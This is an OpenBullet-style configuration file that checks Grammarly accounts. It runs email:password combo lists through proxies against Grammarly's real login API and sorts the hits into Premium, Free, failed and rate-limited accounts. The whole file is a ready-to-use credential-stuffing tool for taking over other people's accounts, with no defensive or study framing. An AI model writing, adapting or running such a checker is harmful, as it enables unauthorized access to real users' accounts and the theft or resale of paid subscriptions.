[SETTINGS]
{
  "Name": "Grammarly",
  "SuggestedBots": 100,
  "LastModified": "2018-05-05T19:36:36.6881945+02:00",
  "AdditionalInfo": "Captures Free and Premium in respective categories",
  "Author": "Ruri",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://auth.grammarly.com/v3/api/login" AutoRedirect=TRUE 
  CONTENT "{\"email_login\":{\"email\":\"<USER>\",\"password\":\"<PASS>\"}}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Dalvik/2.1.0" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "{\"error\":\"FAILURE\"}" 
    KEY "USE_FB_LOGIN" 
    KEY "USE_GOOGLE_LOGIN" 
  KEYCHAIN Success AND 
    KEY "firstName" 
    KEY "Premium" 
  KEYCHAIN Ban OR 
    KEY "RATE_LIMITED" 
  KEYCHAIN CUSTOM "FREE" AND 
    KEY "Free" 
    KEY "firstName" 
